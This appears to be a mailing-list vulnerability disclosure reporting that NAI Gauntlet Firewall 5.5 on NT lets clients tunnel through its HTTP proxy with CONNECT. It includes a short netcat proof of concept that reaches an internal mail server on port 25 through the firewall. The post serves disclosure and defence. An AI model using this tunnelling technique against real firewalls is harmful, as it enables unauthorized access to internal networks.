NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)

["Rashed Alabbar" <rashed.alabbar () datafort net>]

Hi all,

    I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.

I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)

Examples: (I'm using Volker Tanger [volker.tanger () discon de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0

HTTP/1.0 200 OK

mail server banner


That's it!


Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email:   rashed.alabbar () datafort net
http://www.datafort.net
_______________________________________________
The preceding E-mail message contains information that is confidential,
may be protected by the attorney-client or other applicable privileges,
and may constitute non-public information, which is intended to be
conveyed only to the designated recipients (s). If you are not an
intended recipient of this message, please notify the sender at (+9714)
391 3040 or via same e-mail. Unauthorized use, dissemination,
distribution, or reproduction of this message is strictly prohibited and
may be unlawful. Internet communications cannot be guaranteed to be
secured or error-free as information could be intercepted, corrupted,
lost, arrive late or contain viruses. The sender therefore does not
accept liability for any errors or omissions in the context of this
message which arise as a result of Internet transmission.